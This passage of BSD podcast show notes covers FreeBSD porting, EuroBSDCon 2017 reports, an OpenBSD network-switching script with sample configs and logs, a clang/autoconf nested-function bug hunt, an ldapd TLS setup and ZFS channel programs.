	${INSTALL_DATA} ${SHELL_COMPLETIONS_DIR}/_fd ${STAGEDIR}${PREFIX}/share/zsh/site-functions

Bonus round, patching source code: sometimes you have to patch the source and send the patch upstream. Merging it upstream can take a while, so you can patch it as part of the install process. An easy way to do it: go to the work/ dir, copy the file you want to patch and add a .orig suffix to the copy, edit the file you want to patch, then execute make makepatch in the port's root.

Submitting the port: first, make sure portlint -AC doesn't give you any errors or warnings. Second, make sure poudriere can build it on both amd64 and i386. If it can't, you have to either fix it or mark the port broken for that arch. Then follow the submission steps, like I did.
If you have any issues you can always ask your question in freebsd-ports on freenode, but try to find your answer in the Porter's Handbook before asking.

Conference Recap: EuroBSDCon 2017 Recap (https://www.freebsdfoundation.org/blog/conference-recap-eurobsdcon-2017-recap/)

The location was wonderful and I loved sneaking out and exploring the city when I could. From what I heard, it was the largest BSD conference in history, with over 320 attendees! Each venue is unique and draws many local BSD enthusiasts, who normally wouldn't be able to travel to a conference. I love having the chance to talk to these people about how they are involved in the projects and what they would like to do. Most of the time, they are asking me questions about how they can get more involved and how we can help. Magical is how I would describe the conference social event. To stand in front of the dinner cruise on the Seine, with the Eiffel Tower standing tall, lit up in the night, while working – talking to our community members, was incredible. But, let me start at the beginning. We attend these conferences to talk to our community members, to find out what they are working on, determine technologies that should be supported in FreeBSD, and what we can do to help and improve FreeBSD. We started the week with a half-day board meeting on Wednesday. BSD conferences give us a chance to not only meet with community members around the world, but to have face-to-face meetings with our team members, who are also located around the world. We worked on refining our strategic direction and goals, determining what upcoming conferences we want FreeBSD presence at and who can give FreeBSD talks and workshops there, discussed current and potential software development projects, and discussed how we can help raise awareness about and increase the use of FreeBSD in Europe. Thursday was the first day of the FreeBSD developer summit, led by our very own Benedict Reuschling. He surprised us all by having us participate in a very clever quiz on France. 45 of us signed into the software, where he'd show the question on the screen and we had a limited amount of time to select our answers, with the results listed on the screen. It was actually a lot of fun, especially since they didn't publicize the names of the people who got the questions wrong. The lucky or most knowledgeable person on France was des@freebsd.org. Some of our board members ran tutorials in parallel to the summit. Kirk McKusick gave his legendary tutorial, An Introduction to the FreeBSD Open-Source Operating System; George Neville-Neil gave his tutorial, DTrace for Developers; and Benedict Reuschling gave a tutorial on Managing BSD Systems with Ansible. I was pleased to have two chairs from ACM-W Europe run an "Increasing Diversity in the BSDs" BoF for the second year in a row. We broke up into three groups to discuss different gender bias situations, and what we can do to address these types of situations, to make the BSD projects more diverse, welcoming, and inclusive. At the end, people asked that we continue these discussions at future BSD conferences and suggested having an expert in the field give a talk on how to increase the diversity in our projects. As I mentioned earlier, the social dinner was on a boat cruising along the Seine. I had a chance to talk to community members in a more social environment. With the conference being in France, we had a lot of first-time attendees from France.
I enjoyed talking to many of them, as well as other people I only get to see at the European conferences. Sunday was full of more presentations and conversations. During the closing session, I gave a short talk on the Foundation and the work we are doing. Then, Benedict Reuschling, Board Vice President, came up and gave out recognition awards to four FreeBSD contributors who have made an impact on the Project.

News Roundup

Playing with the pine64 (https://chown.me/blog/playing-with-the-pine64.html)

Daniel Jakots writes in his blog about his experiences with his two pine64 boards. Finding something to install on it: 6 weeks ago, I ordered two pine64 units. I didn't (and still don't) have much of a plan for them, but I wanted to play with some cheap boards. I finally received them this week. Initially I wanted to install some Linux stuff on them; I didn't have many requirements, so I thought I would just look at what seems to be easy and/or the best supported systemd flavour. I headed over to their wiki. Everything seems either not really maintained, done by some random people, or both. I am not saying random people do bad things, just that installing some random things from the Internet is not really my cup of tea. I heard about Armbian (https://www.armbian.com/pine64/) but the server flavour seems to be experimental, so I got scared of it. And sadly, the whole thing looks to be a lot undermanned. So I went for OpenBSD because I know the stuff and who to har^Wkindly ask for help. Spoiler alert: it's boring because it just works.

Getting OpenBSD on it: I downloaded miniroot62.fs and dd'ed it onto the micro SD card. I was afraid I'd need to fiddle with some things like sysutils/dtb, because I don't know what it does, and for this precise reason I was wrong and I didn't need to do anything. So just dd the miniroot62.fs and you can go to the next checkpoint. I plugged in an HDMI cable, an ethernet cable, and the power; it booted, and I could read for 10 seconds, but then it went dark. Of course, it's because you need a serial console. Of course, I didn't have one. I thought about trying to install OpenBSD blindly; I could probably have succeeded with autoinstall, buuuuuut… Following some good pieces of advice from OpenBSD people I bought some cp2102 (I didn't try to understand what it was or what the other possibilities were, I just wanted something that would work :D). I looked at how to plug the thing in. It appears you can plug it in at two different places, but if you plug it into the Euler bus it could partially power the board, so if you try to reboot it, it would then mess with the power disruption and could lead to an unclean reboot. You just need to plug in three cables: GND, TXD and RXD. Of course, the TXD goes on the RXD pin from the picture and the RXD goes on the TXD pin. Guess why I'm telling you that! That's it. Then you can connect with the usual: $ cu -dl /dev/cuaU0 -s 115200

What's the point of Docker on FreeBSD or Solaris? (http://blog.frankleonhardt.com/2017/whats-the-point-of-docker-on-freebsd-or-solaris/)

Penguinisters are very keen on their docker, but for the rest of us it may be difficult to see what the fuss is all about – it's only been around a few years and everyone's talking about it. And someone asked again today. What are we missing? Well, docker is a solution to a Linux (and Windows) problem that FreeBSD/Solaris doesn't have. Until recently, the Linux kernel only implemented the original user isolation model involving chroot.
More recent kernels have had Control Groups added, which are intended to provide isolation for a group of processes (namespaces). This came out of Google, and they've extended the concept to include processor resource allocation as one of the knobs, which could be a good idea for FreeBSD. The scheduler is aware of the JID of the process it's about to schedule, and I might take a look in the forthcoming winter evenings. But I digress. So if isolation (containerisation in Linux terms) is in the Linux kernel, what is Docker bringing to the party? The only thing I can think of is standardisation and an easy user interface (at the expense of having Python installed). You might think of it in similar terms to ezjail – a complex system intended to do something that is otherwise very simple.

To make a jail in FreeBSD, all you need do is copy the files for your system to a directory. This can even be a whole server's system disk if you like, and jails can run inside jails. You then create a very simple config file, giving the jail a name, the path to your files and what IP addresses to pass through (if any), and you're done. Just type "service jail nameofjail start", and off it goes. Is there any advantage in running Docker? Well, in a way, there is. Docker has a repository of system images that you can just install and run, and this is what a lot of people want. They're a bit like virtual appliances, but not mind-numbingly inefficient.

You can actually run Docker on FreeBSD. A port was done a couple of years ago, but it relies on the 64-bit Linux emulation that started to appear in 10.x. The newer the version of FreeBSD the better. Docker is in ports/sysutils/docker-freebsd. It makes use of jails instead of Linux cgroups, and requires ZFS rather than UFS for file system isolation. I believe the Linux version uses Union FS but I could be completely wrong on that. The FreeBSD port works with the Docker Hub repository, giving you access to thousands of pre-packaged system images to play with. And that's about as far as I've ever tested it. If you want to run the really tricky stuff (like Windows) you probably want full hardware emulation and something like Xen. If you want to deploy or migrate FreeBSD or Solaris systems, just copy a new tarball into the directory and go. It's a non-problem, so why make it more complicated? Given the increasing frequency with which Docker turns up in conversations, it's probably worth taking seriously as Linux applications get packaged up into images for easy access. Jails/Zones may be more efficient, and Docker images are limited to binary, but convenience tends to win in many environments.

Network Manager Control for OpenBSD (http://www.vincentdelft.be/post/post_20171023)

I propose a small script allowing you to easily manage your network connections. This script is integrated within the openbox dynamic menus. Moreover, it allows you to automatically bring up the connections you have pre-defined. I was frustrated not to be able to swap quickly from one network interface to another, to connect simply and quickly to my wifi, to my cable connection, to the wifi of a friend... Every time you have to type the ifconfig commands. This is fine, but boring, especially when you are in the middle of a presentation and you just want a quick connection to your mobile in tethering mode. Thanks to OpenBSD those commands are not so hard, but it frustrated me not to be able to do it with one click, directly from my windowing environment – since I'm using Openbox, from an openbox menu.

So, I looked around to see what currently exists. One tool I found was netctl (https://github.com/akpoff/netctl). The idea is to have a repository of hostname.if files ready to use for different cases. The idea sounds great, but I had some difficulties using it. What annoys me the most is that it modifies the current hostname.if files in /etc. To my eyes, I would avoid modifying those files because they are my working basis: I want to rely on them and make sure that my network will be back to a normal state after a reboot. Nevertheless, if I've understood netctl correctly, it has a feature where it will look for the predefined network config matching the environment you are in. Very cool. So, after having played with netctl and looked for alternatives on the internet, I decided to create nmctl, a small python script which just performs the necessary network commands.

1. nmctl: a Network Manager Control tool for OpenBSD. Nmctl is a small tool that allows you to manage your network connections. Why python? Just because it's the easiest programming language for me. But I should maybe rewrite it in shell, which is more standard in the OpenBSD world than python.

1.1. download and install: I've put nmctl on my sourceforge account here (https://sourceforge.net/p/nmctl/code/ci/master/tree/). You can download the last version here (https://sourceforge.net/p/nmctl/code/ci/master/tarball). To install you just have to run make install (as root). The prerequisites are: having python2.7 installed, and, since nmctl must be run as root, I strongly recommend you run it via doas (http://man.openbsd.org/doas.conf.5).

1.2. The config file: first you have to create a config and store it in /etc/nmctl.conf. This file must respect a few rules. Each block must start with a line of the form name:interface. Each following line must start with at least one space; those lines have more or less the same format as for hostname.if. You have to create a block with the name "open"; this will be used to establish a connection to the open wifi networks around you (in a restaurant, for example). The order of the blocks is important: in case you use the -restart option, nmctl will try each of the network configs one after another until it can ping www.google.com (if you want to ping something else, you can change it in the python script). You can use external commands; just precede them with "!". You have macros, which allow you to perform some actions: the two currently implemented insert the nwid of the open wifi selected with the -open option, and generate a random MAC address (useful to test a DHCP server, for example). You have keywords; currently the only one implemented is "dhcp". Basically you can put in a block all the commands that nmctl will apply to the interface the block refers to, so each line effectively becomes "ifconfig <interface> <line>". Check the ifconfig manpage to see how flexible that command is. The keyword "dhcp" will trigger a command like "dhclient <interface>".
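Before looking at a sample config, here is the core idea in code: a rough, hypothetical Python sketch of the apply-and-verify loop that the -restart option described above implies. This is not the actual nmctl source; the network table and command handling are simplified assumptions, using sample values from the article:

```
import subprocess

# Parsed form of an /etc/nmctl.conf-style file: name -> (interface, lines).
# Lines starting with "!" are external commands, "dhcp" runs dhclient,
# anything else is passed through to "ifconfig <interface> ...".
NETWORKS = {
    "home":  ("iwn0", ["!route flush", "nwid Linksys19594 wpakey apassword", "dhcp"]),
    "cable": ("em0",  ["!route flush", "dhcp"]),
}

def run(command):
    # Run a shell command and return its exit code (0 means success).
    return subprocess.run(command, shell=True).returncode

def apply_network(interface, lines):
    for line in lines:
        if line.startswith("!"):
            run(line[1:])                        # external command
        elif line == "dhcp":
            run(f"dhclient {interface}")         # keyword
        else:
            run(f"ifconfig {interface} {line}")  # plain ifconfig arguments

def restart(networks):
    # Try each pre-defined network in order until one gets us online.
    for name, (interface, lines) in networks.items():
        apply_network(interface, lines)
        if run("ping -c1 -w2 www.google.com") == 0:
            print(f"connected via '{name}'")
            return name
    print("no pre-defined network is reachable")
    return None

if __name__ == "__main__":
    restart(NETWORKS)
```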
Since I'm using Openbox, from a menu of openbox. So, I've looked around to see what is currently existing. One tool I've found was netctl (https://github.com/akpoff/netctl). The idea is to have a repository of hostname.if files ready to use for different cases. The idea sounds great, but I had some difficulties to use it. But what annoys me the most, is that it modify the current hostname.if files in /etc. To my eyes, I would avoid to modify those files because they are my working basis. I want to rely on them and make sure that my network will be back to a normal mode after a reboot. Nevertheless, if I've well understood netctl, you have a feature where it will look for the predefined network config matching the environment where you are. Very cool. So, after having played with netctl, look for alternative on internet, I've decided to create nmctl. A small python script which just perform the mandatory network commands. 1. nmctl: a Network Manager Control tool for OpenBSD Nmctl a small tool that allow you to manage your network connections. Why python ? Just because it's the easiest programming language for me. But I should maybe rewrite it in shell, more standard in the OpenBSD world than python. 1.1. download and install I've put nmctl on my sourceforge account here (https://sourceforge.net/p/nmctl/code/ci/master/tree/) You can dowload the last version here (https://sourceforge.net/p/nmctl/code/ci/master/tarball) To install you just have to run: make install (as root) The per-requists are: - having python2.7 installed - Since nmctl must be run as root, I strongly recommend you to run it via doas (http://man.openbsd.org/doas.conf.5). 1.2. The config file First you have to create a config and store it in /etc/nmctl.conf. This file must respect few rules: Each block must starts with a line having the following format: ''':''' Each following lines must start by at least one space. Those lines have more or less the same format as for hostname.if. You have to create a block with the name "open". This will be used to establish a connection to the Open Wifi around you (in restaurant for example) The order of those elements is important. In case you use the -restart option, nmctl will try each of those network configs one after one until it can ping www.google.com. (if you wan to ping something else, you can change it in the python script if you want). You can use external commands. Just preced them with the "!". You have macors. Macros allow you to perform some actions. The 2 currently implemented are '''''' and ''''''. You can use keywords. Currently the only one implemented is "dhcp" Basically you can put all commands that nmctl will apply to the interface to which those commands are referring to. So, you will always have "ifconfig ". Check the manpage of ifconfig to see how flexible command is. You have currently 2 macros: - which refers to the "nwid " when you select an Open Wifi with the -open option of nmctl. - is a macro generating a random mac address. This is useful test a dhcp server for example. The keyword "dhcp" will trigger a command like "dhclient ". 1.3. Config file sample. Let me show you one nmctl.conf example. It speaks by itself. ``` # the name open is required for Open wifi. # this is the interface that nmctl will take to establish a connection # We must put the macro . 
This is where nmctl will put the nwid command # and the selected openwifi selected by the parameter --open open:iwn0 !route flush -wpa dhcp cable:em0 !route flush dhcp lgg4:iwn0 !route flush nwid LGG4s_8114 wpakey aanotherpassword dhcp home:iwn0 !route flush nwid Linksys19594 wpakey apassword dhcp college:iwn0 !route flush nwid john wpakey haahaaaguessme dhcp cable_fixip:em0 !route flush inet 192.168.3.3 netmask 255.255.255.0 !route add -host default 192.168.3.1 # with this network interface I'm using the macro # which will do what you guess it will do :-) cable_random:em0 !route flush lladdr dhcp ``` In this config we have several cable's networks associated with my interface "em0" and several wifi networks associated with my wireless interface "iwn0". You see that you can switch from dhcp, to fixed IP and even you can play with the random mac address macro. Thanks to the network called "open", you can connect to any open wifi system. To do that, just type ''' nmctl --open ''' So, now, with just one command you can switch from one network configuration to an another one. That's become cool :-). 2. Integration with openbox Thanks to the dynamic menu feature of oenbox[sic], you can have your different pre-defined networks under one click of your mouse. For that, you just have to add, at the most appropriate place for you, the following code in your ./config/openbox/menu.xml In this case, you see the different networks as defined in the config file just above. 3. Automatically identify your available connection and connect to it in one go But the most interesting part, is coming from a loop through all of your defined networks. This loop is reachable via the -restart option. Basically the idea is to loop from the first network config to the last and test a ping for each of them. Once the ping works, we break the loop and keep this setting. Thus where ever you are, you just have to initiate a nmctl -restart and you will be connected to the network you have defined for this place. There is one small exception, the open-wifis. We do not include them in this loop exercise. Thus the way you define your config file is important. Since the network called "open" is dedicated to "open wifi", it will not be part of this scan exercise. I propose you keep it at the first place. Then, in my case, if my mobile, called lgg4, is open and visible by my laptop, I will connect it immediately. Second, I check if my "home wifi" is visible. Third, if I have a cable connected on my laptop, I'm using this connection and do a dhcp command. Then, I check to see if my laptop is not viewing the "college" wifi. ? and so on until a ping command works. If you do not have a cable in your laptop and if none of your pre-defined wifi connections are visible, the scan will stop. 3.1 examples No cable connected, no pre-defined wifi around me: t420:~$ time doas nmctl -r nwids around you: bbox2-d954 0m02.97s real 0m00.08s user 0m00.11s system t420:~$ t420:~$ I'm at home and my wifi router is running: ``` t420:~$ time doas nmctl -r nwids around you: Linksys19594 bbox2-d954 ifconfig em0 down: 0 default fw done fw 00:22:4d:ac:30:fd done nas link#2 done route flush: 0 ifconfig iwn0 nwid Linksys19594 ...: 0 iwn0: no link ........... sleeping dhclient iwn0: 0 Done. 
PING www.google.com (216.58.212.164): 56 data bytes 64 bytes from 216.58.212.164: icmp_seq=0 ttl=52 time=12.758 ms --- www.google.com ping statistics --- 1 packets transmitted, 1 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 12.758/12.758/12.758/0.000 ms ping -c1 -w2 www.google.com: 0 0m22.49s real 0m00.08s user 0m00.11s system t420:~$ ``` I'm at home but tethering is active on my mobile: ``` t420:~$ t420:~$ time doas nmctl -r nwids around you: Linksys19594 bbox2-d954 LGG4s8114 ifconfig em0 down: 0 default fw done fw 00:22:4d:ac:30:fd done nas link#2 done route flush: 0 ifconfig iwn0 nwid LGG4s8114 ...: 0 iwn0: DHCPDISCOVER - interval 1 iwn0: DHCPDISCOVER - interval 2 iwn0: DHCPOFFER from 192.168.43.1 (a0:91:69:be:10:49) iwn0: DHCPREQUEST to 255.255.255.255 iwn0: DHCPACK from 192.168.43.1 (a0:91:69:be:10:49) iwn0: bound to 192.168.43.214 -- renewal in 1800 seconds dhclient iwn0: 0 Done. ping: Warning: www.google.com has multiple addresses; using 173.194.69.99 PING www.google.com (173.194.69.99): 56 data bytes 64 bytes from 173.194.69.99: icmp_seq=0 ttl=43 time=42.863 ms --- www.google.com ping statistics --- 1 packets transmitted, 1 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 42.863/42.863/42.863/0.000 ms ping -c1 -w2 www.google.com: 0 0m13.78s real 0m00.08s user 0m00.13s system t420:~$ ``` Same situation, but I cut the tethering just after the scan. Thus the dhcp command will not succeed. We see that, after timeouts, nmctl see that the ping is failing (return code 1), thus he pass to the next possible pre-defined network. ``` t420:~$ time doas nmctl -r nwids around you: Linksys19594 bbox2-d954 LGG4s8114 ifconfig em0 down: 0 default 192.168.43.1 done 192.168.43.1 a0:91:69:be:10:49 done route flush: 0 ifconfig iwn0 nwid LGG4s8114 ...: 0 iwn0: no link ........... sleeping dhclient iwn0: 0 Done. ping: no address associated with name ping -c1 -w2 www.google.com: 1 ifconfig em0 down: 0 192.168.43.1 link#2 done route flush: 0 ifconfig iwn0 nwid Linksys19594 ...: 0 iwn0: DHCPREQUEST to 255.255.255.255 iwn0: DHCPACK from 192.168.3.1 (00:22:4d:ac:30:fd) iwn0: bound to 192.168.3.16 -- renewal in 302400 seconds dhclient iwn0: 0 Done. PING www.google.com (216.58.212.164): 56 data bytes 64 bytes from 216.58.212.164: icmp_seq=0 ttl=52 time=12.654 ms --- www.google.com ping statistics --- 1 packets transmitted, 1 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 12.654/12.654/12.654/0.000 ms ping -c1 -w2 www.google.com: 0 3m34.85s real 0m00.17s user 0m00.20s system t420:~$ ``` OpenVPN Setup Guide for FreeBSD (https://www.c0ffee.net/blog/openvpn-guide) OpenVPN Setup Guide Browse securely from anywhere using a personal VPN with OpenVPN, LDAP, FreeBSD, and PF. A VPN allows you to securely extend a private network over the internet via tunneling protocols and traffic encryption. For most people, a VPN offers two primary features: (1) the ability to access services on your local network over the internet, and (2) secure internet connectivity over an untrusted network. In this guide, I'll describe how to set up a personal VPN using OpenVPN on FreeBSD. The configuration can use both SSL certificates and LDAP credentials for authentication. We'll also be using the PF firewall to NAT traffic from our VPN out to the internet. 
One important note about running your own VPN: since you are most likely hosting your server using a VPS or hosting provider, with a public IP address allocated specifically to you, your VPN will not give you any extra anonymity on the internet. If anything, you'll be making yourself more of a target, since all your activity can be trivially traced back to your server's IP address. So while your VPN will protect you from a snooping hacker on the free WiFi at Starbucks, it won't protect you from a federal investigation. This guide assumes you are running FreeBSD with the PF firewall. If you're using a different Unix flavor, I'll probably get you most of the way there—but you'll be on your own when configuring your firewall and networking. Finally, I've used example.com and a non-routable public IP address for all the examples in this guide. You'll need to replace them with your own domain name and public IP address.

Beastie Bits

BSDCan 2017 videos (https://www.youtube.com/channel/UCuQhwHMJ0yK2zlfyRr1XZ_Q/feed)
Getting started with OpenBSD device driver development PDF (https://www.openbsd.org/papers/eurobsdcon2017-device-drivers.pdf)
AWS CloudWatch Logs agent for FreeBSD (https://macfoo.wordpress.com/2017/10/27/aws-cloudwatch-logs-agent-for-freebsd/)
FreeBSD Foundation November 2017 Development Projects Update (https://www.freebsdfoundation.org/blog/november-2017-development-projects-update/)
Schedule for the BSD Devroom at FOSDEM 2018 (https://fosdem.org/2018/schedule/track/bsd/)

***

Feedback/Questions

Matt - The show and Cantrill (http://dpaste.com/35VNXR5#wrap)
Paulo - FreeBSD Question (http://dpaste.com/17E9Z2W#wrap)
Steven - Virtualization under FreeBSD (http://dpaste.com/1N6F0TC#wrap)

***

BSD Now
216: Software is storytelling

BSD Now

Play Episode Listen Later Oct 18, 2017 109:21


EuroBSDcon trip report, how to secure OpenBSD's LDAP server, ZFS channel programs in FreeBSD HEAD, and why software is storytelling.

This episode was brought to you by

Headlines

EuroBSDcon Trip Report

This is from Frank Moore, who has been supplying us with collections of links for the show and whom we met at EuroBSDcon in Paris for the first time. Here is his trip report.

My attendance at the EuroBSDCon 2017 conference in Paris was sprinkled with several 'firsts'. My first visit to Paris, my first time travelling on a EuroTunnel Shuttle train, and my first time at any BSD conference. Hopefully, none of these will turn out to be 'lasts'. I arrived on the Wednesday afternoon before the conference started on Thursday morning. My hotel was conveniently located close to the conference centre in Paris' 3rd arrondissement. This area is well-known as a buzzy enclave of hip cafes, eateries, independent shops, markets, modern galleries and museums. It certainly lived up to its reputation. Even better, the weather held over the course of the conference, only raining once, with the rest of the time being both warm and sunny. The first two days were taken up with attending Dr Kirk McKusick's excellent tutorial 'An Introduction to the FreeBSD Open-Source Operating System'. This is training "straight from the horse's mouth". Kirk has worked extensively on BSD and FreeBSD since the 1980s, helping to design the original BSD filesystem (FFS) and later working on UFS as well. Not only is Kirk an engaging speaker, making what could be a dry topic very interesting, he also sprinkles liberal doses of history and war stories throughout his lectures. Want to know why a protocol was designed the way that it was? Or why a system flag has a particular value or position in a record? Kirk was there and has the first-hand answer. He reminisces about his meetings and work with other Unix and BSD luminaries and debunks and confirms common myths in equal measure. Kirk's teaching style and knowledge are impressive. Every section starts with an overview and a big picture diagram before drilling down into the nitty-gritty detail. Nothing feels superfluous, and everything fits together logically. It's easy to tell that the material and its delivery have been honed over many years, but without feeling stale. Topics covered included the kernel, processes, virtual memory, threads, I/O, devices, FFS, ZFS, and networking. The slides were just as impressive, with additional notes written by a previous student and every slide containing a reference back to the relevant page(s) in the 2nd edition of Kirk's operating system book. As well as a hard copy for those that requested it, Kirk also helpfully supplied soft copies of all the training materials. The breaks in between lectures were useful for meeting the students from the other tutorials and for recovering from the inevitable information overload. It's not often that you get the chance to hear someone as renowned as Dr McKusick give a lecture on something as important as the FreeBSD operating system. If you have any interest in FreeBSD, Unix history, or operating systems in general, I would urge you to grab the opportunity to attend one of his lectures. You won't be disappointed. The last two days of the conference consisted of various hour-long talks by members of each of the main BSD systems. All of them were fairly evenly represented except Dragonfly BSD, which unfortunately only had one talk.
With three talks going on at any one time, it was often difficult to pick which one to go to. At other times there might be nothing to pique the interest. Attendance at a talk is not mandatory, so for those times when no talks looked inviting, just hanging out in one of the lobby areas with other attendees was often just as interesting and informative. The conference centre itself was certainly memorable, with the interior design of an Egyptian temple or pyramid. All the classrooms were more than adequate, while the main auditorium was first-class and easily held the 300+ attendees comfortably. All in all, the facilities, catering and organisation were excellent. Kudos to the EuroBSDCon team, especially Bapt and Antoine, for all their hard work and hospitality. As a long-time watcher and occasional contributor to the BSD Now podcast, it was good to meet both Allan and Benedict in the flesh. And having done some proofreading for Michael Lucas previously, it was nice to finally meet him as well. My one suggestion to the organisers of the next conference would be to provide more hand-holding for newbies. As a first-time attendee at a BSD conference, it would have been nice to have been formally introduced to various people within the projects as the go-to people for their areas. I could do this myself, but it's not always easy finding the right person and wrangling an introduction. I also think it was a missed opportunity for each project to recruit new developers to their cause. Apparently, this is already in place at BSDCan, but should probably be rolled out across all BSD conferences. Having said all that, my aims for the conference were to take Dr McKusick's course, meet a few BSD people and make contacts within one of the BSD projects to start contributing. I was successful on all these fronts, so for me this was mission accomplished. Another first! autoconf/clang (No) Fun and Games (https://undeadly.org/cgi?action=article;sid=20170930133438) Robert Nagy (robert@) wrote in with a fascinating story of hunting down a recent problem with ports: You might have noticed the number of commits to ports regarding autoconf and nested functions and asked yourself… what the hell is this all about? I was hanging out at my friend Antoine (ajacoutot@)'s place just before EuroBSDCon 2017 started and we were having drinks and he told me that there is this weird bug where GNOME hangs completely after just a couple of seconds of usage and the gnome-shell process just sits in the fsleep state. This started to happen at the time when inteldrm(4) was updated, the default compiler was switched to clang(1) and futexes were turned on by default. The next day we started to have a look at the issue and since the process was hanging in fsleep, it seemed clear that the cause must be futexes, so we had to start bisecting the base system, which resulted in random success and failure. In the end we figured out that it was neither futex nor inteldrm(4) related, so the only thing left was the switch to clang. Now the problem was that we had to figure out which part of the system needs to be built with clang to trigger this issue, so we kept on going and systematically recompiled the base system with gcc until everything was ruled out … and it kept on hanging. 
We were drunk and angry that now we had to go and check hundreds of ports, because GNOME is not a small standalone port, so between two bottles of wine a build VM was fired up to do a package build with gcc, because manually building all the dependencies would just take too long and we had spent almost two days on this already. The next day ~200 packages were available to bisect and figure out what was going on. After a couple of tries it turned out that the hang was being caused by the gtk+3 package, which is bad since almost everything is using gtk+3. Now it was time to figure out which file of the gtk+3 source, when built with clang, was causing the issue. (Compiler optimizations were ruled out already at this point.) So another set of bisecting happened, building each subdirectory of gtk+3 with clang and waiting for the hang to manifest … and it did not. What the $f? Okay, so something else was going on; maybe the configure script of gtk+3 was doing something weird with different compilers, so I quickly did two configure runs with gcc and clang and simply diff'd the two directories. Snippets from the diff:

    -GDK_HIDDEN_VISIBILITY_CFLAGS = -fvisibility=hidden
    +GDK_HIDDEN_VISIBILITY_CFLAGS =
    -lt_cv_prog_compiler_rtti_exceptions=no
    +lt_cv_prog_compiler_rtti_exceptions=yes
    -#define GDK_EXTERN __attribute__((visibility("default"))) extern
    -lt_prog_compiler_no_builtin_flag=' -fno-builtin'
    +lt_prog_compiler_no_builtin_flag=' -fno-builtin -fno-rtti -fno-exceptions'

Okay, okay, that's something, but wait … clang has symbol visibility support, so what is going on again? Let's take a peek at config.log:

    configure:29137: checking for -fvisibility=hidden compiler flag
    configure:29150: cc -c -fvisibility=hidden -I/usr/local/include -I/usr/X11R6/include conftest.c >&5
    conftest.c:82:17: error: function definition is not allowed here
    int main (void) { return 0; }
                    ^
    1 error generated.

Okay, that's clearly an error, but why exactly? autoconf basically generates a huge shell script that will check for whatever you throw at it by creating a file called conftest.c, putting chunks of code into it and then trying to compile it. In this case the relevant part of the code was:

    | int
    | main ()
    | {
    | int main (void) { return 0; }
    |   ;
    |   return 0;
    | }

That is a nested function declaration, which is a GNU extension and is not supported by clang. But that's okay; the question is why the hell you would use nested functions to check for simple compiler flags. The next step was to go and check what is going on in configure.ac to see how the configure script is generated. In the gtk+3 case the following snippet is used:

    AC_MSG_CHECKING([for -fvisibility=hidden compiler flag])
    AC_TRY_COMPILE([], [int main (void) { return 0; }],
                   AC_MSG_RESULT(yes)
                   enable_fvisibility_hidden=yes,
                   AC_MSG_RESULT(no)
                   enable_fvisibility_hidden=no)

According to the autoconf manual, the AC_TRY_COMPILE macro takes the includes as its first argument and only a function body as its second. That clearly states that just a function body has to be specified, because the surrounding function definition is already provided automatically, so doing AC_TRY_COMPILE([], [int main (void) { return 0; }], …) instead of AC_TRY_COMPILE([], [], …) will result in a nested function declaration, which will work just fine with gcc, even though the autoconf usage is wrong. After fixing the autoconf macro in gtk+3 and rebuilding the complete port from scratch with clang, the hang completely went away as the proper CFLAGS and LDFLAGS were picked up by autoconf for the build. 
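To see the failure in isolation, here is a minimal sketch (our own illustration, not the generated conftest.c itself) of the kind of code this autoconf misuse produces:

    /* nested.c -- a function defined inside another function.
     * gcc compiles this as a GNU C extension; clang rejects it with
     * "error: function definition is not allowed here". */
    int
    main(void)
    {
        int inner(void) { return 42; }  /* nested definition, GNU extension */
        return inner();
    }

Build it with 'gcc nested.c' and it compiles; build it with 'clang nested.c' and you get exactly the error shown in the config.log excerpt above, which is why the same configure check gave different answers under the two compilers.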
At this point we realized that most of the ports tree uses autoconf, so this issue might be a lot bigger than we thought. I asked sthen@ to do a grep on the ports object directory and just search for "function definition is not allowed here", which turned up ~60 additional affected ports. Out of that list there were only two false positive matches; these were actually trying to test whether the compiler supports nested functions. The rest were a combination of several autoconf macros used in a wrong way, e.g. AC_TRY_COMPILE and AC_TRY_LINK. Most of them were fixable by just removing the extra function declaration or by switching to other autoconf macros like AC_LANG_SOURCE, where you can actually declare your own functions if need be. The conclusion is that this issue was a combination of people copy/pasting autoconf snippets instead of reading the documentation and using the macros in the way they were intended, and the fact that switching to a new compiler is never easy: bugs or undefined behaviour are always lurking in the dark. Thanks to everyone who helped fix all the ports up this quickly! Hopefully all of the changes can be merged upstream, so that others can benefit as well. Interview - David Carlier - @devnexen (https://twitter.com/devnexen) Software Engineer at Afilias *** News Roundup Setting up OpenBSD's LDAP Server (ldapd) with StartTLS and SASL (http://blog.databasepatterns.com/2017/08/setting-up-openbsds-ldap-server-ldapd.html) A tutorial on setting up OpenBSD's native LDAP server with TLS encryption and SASL authentication. OpenBSD has its own LDAP server, ldapd. Here's how to configure it for use with StartTLS and SASL authentication: Create a certificate (acme-client anyone?). Create a basic config file containing the line 'listen on em0 tls certificate ldapserver'; this will listen on the em0 interface with TLS, using the certificate called ldapserver.crt / ldapserver.key. Validate the configuration: /usr/sbin/ldapd -n Enable and start the service: rcctl enable ldapd; rcctl start ldapd On the client machine: pkg_add openldap-client Copy the certificate to /etc/ssl/trusted.crt Add this line to /etc/openldap/ldap.conf: TLS_CACERT /etc/ssl/trusted.crt Enable and start the service: rcctl enable saslauthd; rcctl start saslauthd Connect to ldapd (-ZZ means force TLS, use -H to specify the URI): ldapsearch -H ldap://ldapserver -ZZ FreeBSD Picks Up Support for ZFS Channel Programs in -current (https://svnweb.freebsd.org/base?view=revision&revision=324163) ZFS channel programs (ZCP) add support for performing compound ZFS administrative actions via Lua scripts in a sandboxed environment (with time and memory limits). This initial commit includes both base support for running ZCP scripts, and a small initial library of API calls which support getting properties and listing, destroying, and promoting datasets. Testing: in addition to the included unit tests, channel programs have been in use at Delphix for several months for batch destroying filesystems. Take a simple task as an example: create a snapshot, then set a property on that snapshot. In the traditional system, when you issue the snapshot command, that closes the currently open transaction group (say #100) and opens a new one, #101. While #100 is being written to disk, other writes are accumulated in #101. Once #100 is flushed to disk, the 'zfs snapshot' command returns. You can then issue the 'zfs set' command. This actually ends up going into transaction group #102. 
